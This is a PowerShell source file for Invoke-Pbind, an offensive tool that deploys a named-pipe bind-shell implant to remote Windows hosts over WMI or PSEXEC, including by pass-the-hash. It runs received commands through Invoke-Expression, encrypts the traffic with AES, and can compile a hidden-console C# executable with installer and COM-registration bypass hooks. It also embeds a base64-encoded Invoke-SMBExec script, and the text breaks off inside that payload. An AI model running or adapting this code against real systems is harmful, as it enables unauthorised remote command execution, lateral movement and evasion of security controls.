<#
Required Dependencies : None
Optional Dependencies : None
#>
Function Invoke-Pbind {
<#
. SYNOPSIS
Invoke-Pbind is an SMB bind shell that overlays SMB by communicating over a named pipe.
Incorporating input from @bturner's Invoke-Pipekat tool and Invoke-WMIExec from @kevin_robertson.
. DESCRIPTION
When in a locked down environment and needing to deploy a bind shell, Invoke-Pbind will execute an implant on the target
endpoint (using WMI by default, or PSEXEC) and then connect to the host over the created named pipe. This comms method does
not beacon and instead creates one connection to stream data. The client executes in a runspace with functions (Pbind-Command
and Pbind-module) to interact with the implant on the target workstation. If it is not possible to deploy over WMI or PSEXEC,
then use the -exe option to create a bind shell executable and deploy it manually, before connecting with the client.
Interacting with the Implant
###################################################################################
# #
# 1. Load Modules: PS C:\> Pbind-module "c:\modules folder\powerview.ps1" #
# #
# 2. Send Commands to Implant: PS C:\> Pbind-Command "net user administrator" #
# #
# 3. Kill Implant: PS C:\> PBind-Kill #
# #
###################################################################################
. PARAMETER target
Specifies the computer name or ip address of the target system the implant should be deployed or the client should connect to .
. PARAMETER domain
Specifies the domain name used as part of the authentication against the target machine .
. PARAMETER user
Specifies the username used as part of the authentication against the target machine .
. PARAMETER password
Specifies the password used as part of the authentication against the target machine .
. PARAMETER key
Specifies the key used by AES to encrypt and decrypt traffic . Must be the correct size . Should only be manually configured when used in client mode .
. PARAMETER secret
Specifies a value that is exchanged between the client and the implant at first connection . If the wrong secret is exchanged the pipe is closed
. PARAMETER pname
Specifies a hard coded pipe name to be used . Most commonly used in client mode to define the pipe on the target .
. PARAMETER timeout
Allows a user configurable option to specify the timeout used by the client to connect to the implant before giving up . Default 60 seconds .
. PARAMETER dir
Specifies the output directory used when in EXE mode .
. PARAMETER automation
Specifies the directory used to store the 'System.Management.Automation.dll' for use in compiling the implant .
. PARAMETER psexec
Specifies the use of PSEXEC instead of WMI as a deployment mechanism .
. PARAMETER client
Switches mode to client only mode , disabling the deployment feature .
. PARAMETER exe
Switches to executable mode , used to create a stand alone implant to be manually deployed .
. EXAMPLE
Invoke-Pbind -Target 10.0 . 0 . 100 -Domain LAB -User Admin -Password Password1
. EXAMPLE
Invoke-Pbind -Target 10.0 . 0 . 100 -Domain LAB -User Admin -Password Password1 -PSexec
. EXAMPLE
Invoke-Pbind -Target 10.0 . 0 . 100 -Domain . -User Admin -Hash AAAAAAAAAAAAAAAAAAAAAAAAA -PSexec
. EXAMPLE
Invoke-Pbind -Target 10.0 . 0 . 100 -Domain . -User Admin -Hash AAAAAAAAAAAAAAAAAAAAAAAAA -user2 john -domain2 LAB - password2 Password1 -PSexec
. EXAMPLE
Invoke-Pbind -Target 10.0 . 0 . 100 -Domain . -User Admin -Password Password1 -timeout 10000
. EXAMPLE
Invoke-pbind -target 10.0 . 0 . 100 -dir " c:\pbind-out " -automation " C:\pbind-in " -exe
. EXAMPLE
Invoke-pbind -target 10.0 . 0 . 100 -secret do1gu -key jhPtfSwdNCWkks3qcDcj8OYtT / a3QY9VS / 3HMX + 54RQ = -pname ndv4ut7fyg -client
#>
Param (
[ Parameter ( Mandatory = $false ) ]
[ string ] $target ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $domain ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $user ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $password ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $domain2 ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $user2 ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $password2 ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $hash ,
[ Parameter ( Mandatory = $false ) ]
[ string ] $key ,
[ Parameter ( Mandatory = $False ) ]
[ string ] $secret ,
[ Parameter ( Mandatory = $False ) ]
[ string ] $pname ,
[ Parameter ( Mandatory = $false ) ]
[ int ] $timeout = 60000 ,
[ Parameter ( Mandatory = $False ) ]
[ string ] $dir ,
[ Parameter ( Mandatory = $False ) ]
[ string ] $automation ,
[ Parameter ( Mandatory = $false ) ]
[ switch ] $psexec ,
[ Parameter ( Mandatory = $false ) ]
[ switch ] $client ,
[ Parameter ( Mandatory = $false ) ]
[ switch ] $exe
)
# State shared between this session and the pipe-client runspace (it is
# handed over by reference via SessionStateProxy.SetVariable further down).
# Synchronized so both sides may read and write it; the Pbind-* helpers
# poll these fields:
#   .log     - decrypted output collected by the client loop
#   .command - next command to send; $null means nothing is pending
#   .state   - becomes $true once the pipe connection is established
$global:pipestate = [ HashTable ] :: Synchronized ( @ { } )
$pipestate . log = New-Object System . Collections . ArrayList
$pipestate . command = $null
$pipestate . state = $false
# Builds a random string of $Length lowercase letters and digits, drawing
# one character per iteration with Get-Random.
# Used below for the default pipe name and connection secret.
# Get-Random is a general-purpose PRNG, not a cryptographic one, so treat
# the result as an identifier rather than as key material.
function Random-Pipe
{
param (
[ int ] $Length
)
$set = 'abcdefghijklmnopqrstuvwxyz0123456789' . ToCharArray ( )
$result = ''
for ( $x = 0 ; $x -lt $Length ; $x + + )
{ $result + = $set | Get-Random }
return $result
}
# creates an AES managed object (CBC, zero padding) from the given key/IV
# Builds the symmetric cipher used by Encrypt-String / Decrypt-String:
# RijndaelManaged with a 128-bit block and 256-bit key (i.e. AES-256),
# CBC mode, zero padding.
# $key and $IV may each be a base64 string or a raw byte array; an
# omitted/empty value leaves that property unset, and the .NET provider
# then generates one lazily when the cipher is first used.
# Review notes: PaddingMode.Zeros is ambiguous - the decryptor cannot tell
# padding from genuine trailing 0x00 bytes (hence the Trim([char]0) in
# Decrypt-String) - and nothing in these helpers authenticates the
# ciphertext (no MAC), so its integrity is never verified.
function Create-AesManagedObject
{
param
( [ Object ]
$key ,
[ Object ]
$IV )
$aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
# CBC with zero padding; BlockSize 128 is what makes Rijndael AES-compatible
$aesManaged . Mode = [ System.Security.Cryptography.CipherMode ] :: CBC
$aesManaged . Padding = [ System.Security.Cryptography.PaddingMode ] :: Zeros
$aesManaged . BlockSize = 128
$aesManaged . KeySize = 256
# Accept either base64 text or raw bytes for the IV
if ( $IV )
{
if ( $IV . getType ( ) . Name -eq 'String' )
{ $aesManaged . IV = [ System.Convert ] :: FromBase64String ( $IV ) }
else
{ $aesManaged . IV = $IV }
}
# Same convention for the key
if ( $key )
{
if ( $key . getType ( ) . Name -eq 'String' )
{ $aesManaged . Key = [ System.Convert ] :: FromBase64String ( $key ) }
else
{ $aesManaged . Key = $key }
}
$aesManaged
}
# creates a random AES symmetric encryption key
# Generates a fresh 256-bit AES key and returns it base64-encoded.
# RijndaelManaged.GenerateKey draws from the .NET cryptographic RNG
# (unlike Random-Pipe, which uses Get-Random).
# Called when no -key is supplied; the same string is later passed to
# both the server and client script blocks.
function Create-AesKey ( )
{
$aesManaged = Create-AesManagedObject
$aesManaged . GenerateKey ( )
[ System.Convert ] :: ToBase64String ( $aesManaged . Key )
}
# encryption utility using Rijndael encryption, an AES equivalent; returns an encrypted base64 block
# Encrypts a string for transmission over the pipe.
# $key: base64 or byte[] AES key; $unencryptedString: plaintext.
# Returns base64(IV || ciphertext). No IV is passed to
# Create-AesManagedObject, so the provider generates a fresh random IV
# when the encryptor is created; it is prepended to the output so that
# Decrypt-String can recover it. The ciphertext is not authenticated.
function Encrypt-String
{
param
(
[ Object ]
$key ,
[ Object ]
$unencryptedString
)
$bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( $unencryptedString )
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged . CreateEncryptor ( )
$encryptedData = $encryptor . TransformFinalBlock ( $bytes , 0 , $bytes . Length )
# 16-byte IV first, then the ciphertext
[ byte[] ] $fullData = $aesManaged . IV + $encryptedData
[ System.Convert ] :: ToBase64String ( $fullData )
}
# decryption utility using Rijndael encryption, an AES equivalent; returns the unencrypted UTF8 data
# Inverse of Encrypt-String: base64-decodes the input, takes the first
# 16 bytes as the IV, decrypts the remainder and returns the UTF-8 text
# with trailing NUL characters stripped (that is how the zero padding is
# removed, so any genuine trailing NULs in the plaintext are lost too).
# Review note: the input is not validated - malformed base64 or fewer
# than 16 bytes throws rather than returning $null, and because the
# ciphertext carries no MAC a corrupted message decrypts to garbage
# instead of being rejected.
function Decrypt-String
{
param
(
[ Object ]
$key ,
[ Object ]
$encryptedStringWithIV
)
$bytes = [ System.Convert ] :: FromBase64String ( $encryptedStringWithIV )
# leading 16 bytes are the IV prepended by Encrypt-String
$IV = $bytes [ 0 . .15 ]
$aesManaged = Create-AesManagedObject $key $IV
$decryptor = $aesManaged . CreateDecryptor ( )
$unencryptedData = $decryptor . TransformFinalBlock ( $bytes , 16 , $bytes . Length - 16 )
[ System.Text.Encoding ] :: UTF8 . GetString ( $unencryptedData ) . Trim ( [ char ] 0 )
}
# Fill in whatever the caller left blank. The AES key comes from the
# crypto RNG (Create-AesKey); the pipe name and the connection secret
# come from Random-Pipe, i.e. Get-Random, which is not a cryptographic
# source. In -client mode all three must match the values the implant
# was started with (see the -key/-secret/-pname example in the help).
if ( ! $key ) {
$key = Create-AesKey
}
if ( ! $pname ) {
$pname = Random-Pipe 10
}
if ( ! $secret ) {
$secret = Random-Pipe 5
}
# creates an AES managed object (start of the server-side script block)
$s_scriptblock = @"
function Create-AesManagedObject
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ IV
)
`$ aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
`$ aesManaged . Mode = [ System.Security.Cryptography.CipherMode ] :: CBC
`$ aesManaged . Padding = [ System.Security.Cryptography.PaddingMode ] :: Zeros
`$ aesManaged . BlockSize = 128
`$ aesManaged . KeySize = 256
if ( `$ IV )
{
if ( `$ IV . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . IV = [ System.Convert ] :: FromBase64String ( `$ IV ) }
else
{ `$ aesManaged . IV = `$ IV }
}
if ( `$ key )
{
if ( `$ key . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . Key = [ System.Convert ] :: FromBase64String ( `$ key ) }
else
{ `$ aesManaged . Key = `$ key }
}
`$ aesManaged
}
function Encrypt-String
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ unencryptedString
)
`$ bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( `$ unencryptedString )
`$ aesManaged = Create-AesManagedObject `$ key
`$ encryptor = `$ aesManaged . CreateEncryptor ( )
`$ encryptedData = `$ encryptor . TransformFinalBlock ( `$ bytes , 0 , `$ bytes . Length )
[ byte[] ] `$ fullData = `$ aesManaged . IV + `$ encryptedData
[ System.Convert ] :: ToBase64String ( `$ fullData )
}
function Decrypt-String
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ encryptedStringWithIV
)
`$ bytes = [ System.Convert ] :: FromBase64String ( `$ encryptedStringWithIV )
`$ IV = `$ bytes [ 0 . .15 ]
`$ aesManaged = Create-AesManagedObject `$ key `$ IV
`$ decryptor = `$ aesManaged . CreateDecryptor ( )
`$ unencryptedData = `$ decryptor . TransformFinalBlock ( `$ bytes , 16 , `$ bytes . Length - 16 )
[ System.Text.Encoding ] :: UTF8 . GetString ( `$ unencryptedData ) . Trim ( [ char ] 0 )
}
function invoke-pserv {
param ( `$ secret , `$ key , `$ pname )
add-Type -assembly 'System.Core'
`$ PipeSecurity = New-Object System . IO . Pipes . PipeSecurity
`$ AccessRule = New-Object System . IO . Pipes . PipeAccessRule ( 'Everyone' , 'ReadWrite' , 'Allow' )
`$ PipeSecurity . AddAccessRule ( `$ AccessRule )
`$ Pipe = New-Object System . IO . Pipes . NamedPipeServerStream ( `$ pname , 'InOut' , 100 , 'Byte' , 'None' , 4096 , 4096 , `$ PipeSecurity )
try {
'Waiting for client connection'
`$ pipe . WaitForConnection ( )
'Connection established'
`$ pipeReader = new-object System . IO . StreamReader ( `$ pipe )
`$ pipeWriter = new-object System . IO . StreamWriter ( `$ pipe )
`$ pipeWriter . AutoFlush = `$ true
`$ PPass = `$ pipeReader . ReadLine ( )
while ( 1 )
{
if ( `$ PPass -ne `$ secret ) {
`$ pipeWriter . WriteLine ( 'Microsoft Error: 151337' )
}
else {
while ( 1 ) {
`$ encCommand = Encrypt-String -unencryptedString 'COMMAND' -Key `$ key
`$ pipeWriter . WriteLine ( `$ encCommand )
`$ command = `$ pipeReader . ReadLine ( )
`$ decCommand = Decrypt-String -key `$ key -encryptedStringWithIV `$ command
if ( `$ deccommand ) {
try {
if ( `$ decCommand -eq 'KILLPIPE' ) { exit }
`$ res = Invoke-Expression `$ decCommand | out-string
if ( `$ res -eq " " ) { `$ res = " No output from command " }
`$ res = `$ res + '123456PS ' + ( Get-Location ) . Path + '>654321'
} catch {
`$ res = 'ErrorUpload: ' + `$ error [ 0 ]
}
`$ fileContentBytes = [ System.Text.Encoding ] :: Unicode . GetBytes ( `$ res )
`$ res = [ System.Convert ] :: ToBase64String ( `$ fileContentBytes )
`$ encCommand2 = Encrypt-String -unencryptedString `$ res -Key `$ key
`$ pipeWriter . WriteLine ( `$ encCommand2 )
`$ pipeWriter . Flush ( )
}
elseif ( ! `$ decCommand ) {
`$ encbad = Encrypt-String -unencryptedString 'This should never fire! - crypto failure' -Key `$ key
`$ pipeWriter . WriteLine ( `$ encbad )
break
}
}
}
`$ encGo = Encrypt-String -unencryptedString 'GOAGAIN' -Key `$ key
`$ pipeWriter . WriteLine ( `$ encGo )
`$ encSure = Encrypt-String -unencryptedString 'SURE' -Key `$ key
`$ pipeWriter . WriteLine ( `$ encSure )
`$ command = `$ pipeReader . ReadLine ( )
`$ decCommand = Decrypt-String -key `$ key -encryptedStringWithIV `$ command
if ( `$ decCommand -eq 'EXIT' ) { break }
}
Start-Sleep -Seconds 2
}
finally {
`$ pipe . Dispose ( )
}
}
invoke-pserv -secret $secret -key $key -pname $pname
" @
$c_scriptblock = @"
function Create-AesManagedObject
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ IV
)
`$ aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
`$ aesManaged . Mode = [ System.Security.Cryptography.CipherMode ] :: CBC
`$ aesManaged . Padding = [ System.Security.Cryptography.PaddingMode ] :: Zeros
`$ aesManaged . BlockSize = 128
`$ aesManaged . KeySize = 256
if ( `$ IV )
{
if ( `$ IV . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . IV = [ System.Convert ] :: FromBase64String ( `$ IV ) }
else
{ `$ aesManaged . IV = `$ IV }
}
if ( `$ key )
{
if ( `$ key . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . Key = [ System.Convert ] :: FromBase64String ( `$ key ) }
else
{ `$ aesManaged . Key = `$ key }
}
`$ aesManaged
}
function Encrypt-String
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ unencryptedString
)
`$ bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( `$ unencryptedString )
`$ aesManaged = Create-AesManagedObject `$ key
`$ encryptor = `$ aesManaged . CreateEncryptor ( )
`$ encryptedData = `$ encryptor . TransformFinalBlock ( `$ bytes , 0 , `$ bytes . Length )
[ byte[] ] `$ fullData = `$ aesManaged . IV + `$ encryptedData
[ System.Convert ] :: ToBase64String ( `$ fullData )
}
function Decrypt-String
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ encryptedStringWithIV
)
`$ bytes = [ System.Convert ] :: FromBase64String ( `$ encryptedStringWithIV )
`$ IV = `$ bytes [ 0 . .15 ]
`$ aesManaged = Create-AesManagedObject `$ key `$ IV
`$ decryptor = `$ aesManaged . CreateDecryptor ( )
`$ unencryptedData = `$ decryptor . TransformFinalBlock ( `$ bytes , 16 , `$ bytes . Length - 16 )
[ System.Text.Encoding ] :: UTF8 . GetString ( `$ unencryptedData ) . Trim ( [ char ] 0 )
}
function invoke-pclient {
param ( `$ Target , `$ secret , `$ key , `$ pname , `$ timeout )
Add-Type -assembly 'System.Core'
`$ pipec = new-object System . IO . Pipes . NamedPipeClientStream ( `$ Target , `$ pname , [ System.IO.Pipes.PipeDirection ] :: InOut ,
[ System.IO.Pipes.PipeOptions ] :: None ,
[ System.Security.Principal.TokenImpersonationLevel ] :: Impersonation )
`$ pipeReader = `$ pipeWriter = `$ null
try {
`$ pipec . Connect ( `$ timeout )
'Connected to Pipe'
`$ pipestate . state = `$ true
`$ pipeReader = new-object System . IO . StreamReader ( `$ pipec )
`$ pipeWriter = new-object System . IO . StreamWriter ( `$ pipec )
`$ pipeWriter . AutoFlush = `$ true
`$ pipeWriter . WriteLine ( `$ secret )
while ( 1 ) {
while ( ( `$ msg = Decrypt-String -key `$ key -encryptedStringWithIV `$ pipeReader . ReadLine ( ) ) -notmatch 'COMMAND|GOAGAIN' ) {
`$ pipestate . log + = [ System.Text.Encoding ] :: Unicode . GetString ( [ System.Convert ] :: FromBase64String ( `$ msg ) )
}
if ( `$ msg -match 'GOAGAIN' ) { break }
while ( `$ pipestate . command -eq `$ null ) { }
if ( `$ pipestate . kill -eq 'KILLPIPE' ) {
`$ encSure = Encrypt-String -unencryptedString 'SURE' -Key `$ key
`$ pipeWriter . WriteLine ( `$ encSure )
}
#`$blah = `$pipestate.mod | out-string
#if (((`$blah).ToLower()).StartsWith("loadmodule")) {
#if (`$blah -eq `$encSure) {
# `$module = `$blah -replace 'loadmodule ', ''
# `$pipestate.command = gc `$module | out-string
#}
if ( ( `$ pipestate . command ) . ToLower ( ) . StartsWith ( 'squirtmodule' ) ) {
`$ squirt = `$ pipestate . command -replace 'squirtmodule ' , ''
`$ pipestate . command = `$ squirt | Out-String
}
#`$pipestate.history = `$pipestate.command
`$ baseCommand = `$ pipestate . command
`$ encCommand = Encrypt-String -unencryptedString `$ baseCommand -Key `$ key
`$ pipeWriter . WriteLine ( `$ encCommand )
`$ script : pipestate . command = `$ null
}
}
finally {
`$ pipec . Dispose ( )
}
}
invoke-pclient -Target $target -secret $secret -key $key -pname $pname -timeout $timeout
" @
# -client mode: only the pipe client is started, in its own runspace so
# this session stays interactive. $pipestate is shared with the runspace
# by reference through SessionStateProxy; the client script reports back
# by setting .state and appending to .log.
if ( $client . IsPresent ) {
$PIPE_runspace = [ RunspaceFactory ] :: CreateRunspace ( )
$PIPE_runspace . Open ( )
$PIPE_runspace . SessionStateProxy . SetVariable ( 'pipestate' , $pipestate )
$PIPE_powershell = [ PowerShell ] :: Create ( )
$PIPE_powershell . Runspace = $PIPE_runspace
$PIPE_powershell . AddScript ( $c_scriptblock ) > $null
$PIPE_powershell . BeginInvoke ( ) > $null
echo " "
# Busy-wait (no sleep, so this spins a core) for up to $timeout ms until
# the client flags the connection as established.
$endtime = ( Get-Date ) . AddMilliseconds ( $timeout )
while ( ( Get-Date ) -lt $endtime ) {
if ( $pipestate . state -eq $true )
{ break }
}
if ( $pipestate . state -eq $True ) {
echo " Connected: $target - $pname "
echo " "
}
elseif ( ( get-date ) -lt $endtime ) {
# NOTE(review): unreachable - the loop above ends either by break
# (state is $true, handled by the branch above) or once the deadline
# has passed, so this condition is always $false here and a timeout
# falls through to the final else.
echo " Not Connected: Timeout occured "
}
else {
echo " Not Connected: :-( "
}
}
elseif ( $exe . isPresent ) {
if ( ! $dir ) {
$dir = " C:\temp "
}
if ( ! $automation ) {
Write-host " You need to tell me where to get the automation dll to continue "
break
}
# create exe
$bytescom = [ System.Text.Encoding ] :: Unicode . GetBytes ( $s_scriptblock )
$praw = [ Convert ] :: ToBase64String ( $bytescom )
$csccode = ' using System ;
using System . Text ;
using System . Diagnostics ;
using System . Reflection ;
using System . Configuration . Install ;
using System . Runtime . InteropServices ;
using System . Collections . ObjectModel ;
using System . Management . Automation ;
using System . Management . Automation . Runspaces ;
using System . EnterpriseServices ;
public class Program
{
[ DllImport ( " kernel32.dll " ) ]
static extern IntPtr GetConsoleWindow ( ) ;
[ DllImport ( " user32.dll " ) ]
static extern bool ShowWindow ( IntPtr hWnd , int nCmdShow ) ;
public const int SW_HIDE = 0 ;
public const int SW_SHOW = 5 ;
public Program ( ) {
try
{
string pb = System . Text . Encoding . Unicode . GetString ( System . Convert . FromBase64String ( " '+ $praw +' " ) ) ;
InvokeAutomation ( pb ) ;
}
catch
{
Main ( ) ;
}
}
public static string InvokeAutomation ( string cmd )
{
Runspace newrunspace = RunspaceFactory . CreateRunspace ( ) ;
newrunspace . Open ( ) ;
RunspaceInvoke scriptInvoker = new RunspaceInvoke ( newrunspace ) ;
Pipeline pipeline = newrunspace . CreatePipeline ( ) ;
pipeline . Commands . AddScript ( cmd ) ;
Collection < PSObject > results = pipeline . Invoke ( ) ;
newrunspace . Close ( ) ;
StringBuilder stringBuilder = new StringBuilder ( ) ;
foreach ( PSObject obj in results )
{
stringBuilder . Append ( obj ) ;
}
return stringBuilder . ToString ( ) . Trim ( ) ;
}
public static void Main ( )
{
var handle = GetConsoleWindow ( ) ;
ShowWindow ( handle , SW_HIDE ) ;
try
{
string pb = System . Text . Encoding . Unicode . GetString ( System . Convert . FromBase64String ( " '+ $praw +' " ) ) ;
InvokeAutomation ( pb ) ;
}
catch
{
Main ( ) ;
}
}
}
public class Bypass : ServicedComponent
{
[ ComRegisterFunction ]
public static void RegisterClass ( string key )
{
Program . Main ( ) ;
}
[ ComUnregisterFunction ]
public static void UnRegisterClass ( string key )
{
Program . Main ( ) ;
}
}
[ System . ComponentModel . RunInstaller ( true ) ]
public class Sample : System . Configuration . Install . Installer
{
public override void Uninstall ( System . Collections . IDictionary savedState )
{
Program . Main ( ) ;
}
public static string InvokeAutomation ( string cmd )
{
Runspace newrunspace = RunspaceFactory . CreateRunspace ( ) ;
newrunspace . Open ( ) ;
RunspaceInvoke scriptInvoker = new RunspaceInvoke ( newrunspace ) ;
Pipeline pipeline = newrunspace . CreatePipeline ( ) ;
pipeline . Commands . AddScript ( cmd ) ;
Collection < PSObject > results = pipeline . Invoke ( ) ;
newrunspace . Close ( ) ;
StringBuilder stringBuilder = new StringBuilder ( ) ;
foreach ( PSObject obj in results )
{
stringBuilder . Append ( obj ) ;
}
return stringBuilder . ToString ( ) . Trim ( ) ;
}
} '
[ IO.File ] :: WriteAllLines ( " $dir \pbind.cs " , $csccode )
if ( Test-Path " C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe " ) {
Start-Process -WindowStyle hidden -FilePath " C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe " -ArgumentList " /out: $dir \notes.exe $dir \pbind.cs /reference: $automation \System.Management.Automation.dll "
} else {
if ( Test-Path " C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe " ) {
Start-Process -WindowStyle hidden -FilePath " C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe " -ArgumentList " /out: $dir \notes.exe $dir \pbind.cs /reference: $automation \System.Management.Automation.dll "
}
}
echo " "
Write-Host -Object " StandAlone Exe written to: $dir \pbind.exe " -ForegroundColor Green
echo " "
if ( ! $target ) {
write-Host -Object " Connection String: invoke-pbind -target <IP Address> -secret $secret -key $key -pname $pname -client " -ForegroundColor Green
} else {
write-Host -Object " Connection String: invoke-pbind -target $target -secret $secret -key $key -pname $pname -client " -ForegroundColor Green
}
}
Else {
# Author: @kevin_robertson
$wmiexec = " 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
# Author: @kevin_robertson
$smbexec = " ZnVuY3Rpb24gSW52b2tlLVNNQkV4ZWMNCnsNCjwjDQouU1lOT1BTSVMNCkludm9rZS1TTUJFeGVjIHBlcmZvcm1zIFNNQkV4ZWMgc3R5bGUgY29tbWFuZCBleGVjdXRpb24gd2l0aCBOVExNdjIgcGFzcyB0aGUgaGFzaCBhdXRoZW50aWNhdGlvbi4gSW52b2tlLVNNQkV4ZWMNCnN1cHBvcnRzIFNNQjEgYW5kIFNNQjIgd2l0aCBhbmQgd2l0aG91dCBTTUIgc2lnbmluZy4NCg0KLlBBUkFNRVRFUiBUYXJnZXQNCkhvc3RuYW1lIG9yIElQIGFkZHJlc3Mgb2YgdGFyZ2V0Lg0KDQouUEFSQU1FVEVSIFVzZXJuYW1lDQpVc2VybmFtZSB0byB1c2UgZm9yIGF1dGhlbnRpY2F0aW9uLg0KDQouUEFSQU1FVEVSIERvbWFpbg0KRG9tYWluIHRvIHVzZSBmb3IgYXV0aGVudGljYXRpb24uIFRoaXMgcGFyYW1ldGVyIGlzIG5vdCBuZWVkZWQgd2l0aCBsb2NhbCBhY2NvdW50cyBvciB3aGVuIHVzaW5nIEBkb21haW4gYWZ0ZXIgdGhlDQp1c2VybmFtZS4gDQoNCi5QQVJBTUVURVIgSGFzaA0KTlRMTSBwYXNzd29yZCBoYXNoIGZvciBhdXRoZW50aWNhdGlvbi4gVGhpcyBtb2R1bGUgd2lsbCBhY2NlcHQgZWl0aGVyIExNOk5UTE0gb3IgTlRMTSBmb3JtYXQuDQoNCi5QQVJBTUVURVIgQ29tbWFuZA0KQ29tbWFuZCB0byBleGVjdXRlIG9uIHRoZSB0YXJnZXQuIElmIGEgY29tbWFuZCBpcyBub3Qgc3BlY2lmaWVkLCB0aGUgZnVuY3Rpb24gd2lsbCBjaGVjayB0byBzZWUgaWYgdGhlIHVzZXJuYW1lDQphbmQgaGFzaCBwcm92aWRlcyBsb2NhbCBhZG1pbmlzdHJhdG9yIGFjY2VzcyBvbiB0aGUgdGFyZ2V0Lg0KDQouUEFSQU1FVEVSIENvbW1hbmRDT01TUEVDDQpEZWZhdWx0ID0gRW5hYmxlZDogUHJlcGVuZCAlQ09NU1BFQyUgL0MgdG8gQ29tbWFuZC4NCg0KLlBBUkFNRVRFUiBTZXJ2aWNlDQpEZWZhdWx0ID0gMjAgQ2hhcmFjdGVyIFJhbmRvbTogTmFtZSBvZiB0aGUgc2VydmljZSB0byBjcmVhdGUgYW5kIGRlbGV0ZSBvbiB0aGUgdGFyZ2V0Lg0KDQouUEFSQU1FVEVSIFNNQjENCihTd2l0Y2gpIEZvcmNlIFNNQjEuIFRoZSBkZWZhdWx0IGJlaGF2aW9yIGlzIHRvIHBlcmZvcm0gU01CIHZlcnNpb24gbmVnb3RpYXRpb24gYW5kIHVzZSBTTUIyIGlmIHN1cHBvcnRlZCBieSB0aGUNCnRhcmdldC4NCg0KLlBBUkFNRVRFUiBTbGVlcA0KRGVmYXVsdCA9IDE1MCBNaWxsaXNlY29uZHM6IFNldHMgdGhlIGZ1bmN0aW9uJ3MgU3RhcnQtU2xlZXAgdmFsdWVzIGluIG1pbGxpc2Vjb25kcy4gWW91IGNhbiB0cnkgdHdlYWtpbmcgdGhpcw0Kc2V0dGluZyBpZiB5b3UgYXJlIGV4cGVyaWVuY2luZyBzdHJhbmdlIHJlc3VsdHMuDQoNCi5FWEFNUExFDQpJbnZva2UtU01CRXhlYyAtVGFyZ2V0IDE5Mi4xNjguMTAwLjIwIC1Eb21haW4gVEVTVERPTUFJTiAtVXNlcm5hbWUgVEVTVCAtSGFzaCBGNkYzOEI3OTNEQjZBOTRCQTA0QTUyRjFEM0VFOTJGMCAtQ29tbWFuZCAiY29tbWFuZCBvciBsYXVuY2hlciB0byBleGVjdXRlIiAtdmVyYm9zZQ0KDQouRVhBTVBMRQ0KSW5
2b2tlLVNNQkV4ZWMgLVRhcmdldCAxOTIuMTY4LjEwMC4yMCAtRG9tYWluIFRFU1RET01BSU4gLVVzZXJuYW1lIFRFU1QgLUhhc2ggRjZGMzhCNzkzREI2QTk0QkEwNEE1MkYxRDNFRTkyRjAgLUNvbW1hbmQgIm5ldCB1c2VyIFNNQkV4ZWMgV2ludGVyMjAxNyAvYWRkIg0KDQouRVhBTVBMRQ0KSW52b2tlLVNNQkV4ZWMgLVRhcmdldCAxOTIuMTY4LjEwMC4yMCAtRG9tYWluIFRFU1RET01BSU4gLVVzZXJuYW1lIFRFU1QgLUhhc2ggRjZGMzhCNzkzREI2QTk0QkEwNEE1MkYxRDNFRTkyRjANCg0KLkxJTksNCmh0dHBzOi8vZ2l0aHViLmNvbS9LZXZpbi1Sb2JlcnRzb24vSW52b2tlLVRoZUhhc2gNCg0KIz4NCltDbWRsZXRCaW5kaW5nKCldDQpwYXJhbQ0KKA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSR0cnVlKV1bU3RyaW5nXSRUYXJnZXQsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JHRydWUpXVtTdHJpbmddJFVzZXJuYW1lLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW1N0cmluZ10kRG9tYWluLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW1N0cmluZ10kQ29tbWFuZCwNCiAgICBbcGFyYW1ldGVyKE1hbmRhdG9yeT0kZmFsc2UpXVtWYWxpZGF0ZVNldCgiWSIsIk4iKV1bU3RyaW5nXSRDb21tYW5kQ09NU1BFQz0iWSIsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bVmFsaWRhdGVTY3JpcHQoeyRfLkxlbmd0aCAtZXEgMzIgLW9yICRfLkxlbmd0aCAtZXEgNjV9KV1bU3RyaW5nXSRIYXNoLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW1N0cmluZ10kU2VydmljZSwNCiAgICBbcGFyYW1ldGVyKE1hbmRhdG9yeT0kZmFsc2UpXVtTd2l0Y2hdJFNNQjEsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bU3RyaW5nXSRQYXNzd29yZCwNCiAgICBbcGFyYW1ldGVyKE1hbmRhdG9yeT0kZmFsc2UpXVtJbnRdJFNsZWVwPTE1MA0KKQ0KDQppZighJFBhc3N3b3JkIC1hbmQgISRIYXNoKXsNCiAgICBleGl0DQp9DQoNCmlmKCRQYXNzd29yZCl7DQogICAgJEhhc2ggPSBHZXQtTUQ0SGFzaCAtRGF0YVRvSGFzaCAkKFtUZXh0LkVu